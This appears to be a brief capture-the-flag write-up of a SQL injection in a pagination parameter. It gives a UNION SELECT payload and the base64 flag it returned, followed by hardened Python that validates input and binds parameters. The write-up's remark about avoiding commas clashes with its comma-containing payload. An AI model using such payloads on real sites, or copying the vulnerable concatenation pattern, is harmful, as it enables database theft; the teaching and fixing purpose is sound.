There is a SQL injection in the `p` parameter.
However, we must not use commas, since our input gets split on those.
Therefore, we can use this payload:
```
2,10 UNION SELECT * from flag
```
We get `RU5Pe1NRTDFfVzF0aF8wdVRfQzBtbTRfVzBya3NfU29tZUhvd19BZ0Exbl9BbmRfQWc0MW4hfQ==`, which is the flag in base64.
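
For the fix side, here is an added example (not the challenge's code) of how a pagination parameter like `p` can be handled so the payload above is rejected. It assumes `p` is an `offset,count` value that the server pastes into a `LIMIT` clause, which the write-up does not state; the `posts` table, the function names and the SQLite stand-in database are hypothetical, and the vulnerable statement is only built as a string, never executed.

```python
import re
import sqlite3

# Strict "offset,count" grammar: two short decimal integers, nothing else.
PAGE_RE = re.compile(r"\A([0-9]{1,6}),([0-9]{1,3})\Z")
MAX_COUNT = 100

def vulnerable_sql(p: str) -> str:
    """Assumed vulnerable pattern: p is pasted into the statement text."""
    return "SELECT id, title FROM posts LIMIT " + p

def parse_page(p: str) -> tuple[int, int]:
    """Return (offset, count) or raise ValueError for anything off-grammar."""
    m = PAGE_RE.match(p)
    if m is None:
        raise ValueError("p must be 'offset,count' with decimal integers")
    offset, count = int(m.group(1)), int(m.group(2))
    if not 1 <= count <= MAX_COUNT:
        raise ValueError("count out of range")
    return offset, count

def fetch_page(conn, p):
    """Hardened form: validated integers are bound, never concatenated."""
    offset, count = parse_page(p)
    cur = conn.execute(
        "SELECT id, title FROM posts ORDER BY id LIMIT ? OFFSET ?",
        (count, offset),
    )
    return cur.fetchall()

def demo_db():
    """Constructed sample data standing in for the challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE flag (id INTEGER, value TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(i, f"post {i}") for i in range(1, 21)])
    conn.execute("INSERT INTO flag VALUES (1, 'PLACEHOLDER_FLAG')")
    return conn

if __name__ == "__main__":
    db = demo_db()
    print(vulnerable_sql("2,10 UNION SELECT * from flag"))
    print(fetch_page(db, "2,10"))
    try:
        fetch_page(db, "2,10 UNION SELECT * from flag")
    except ValueError as exc:
        print("rejected:", exc)
```
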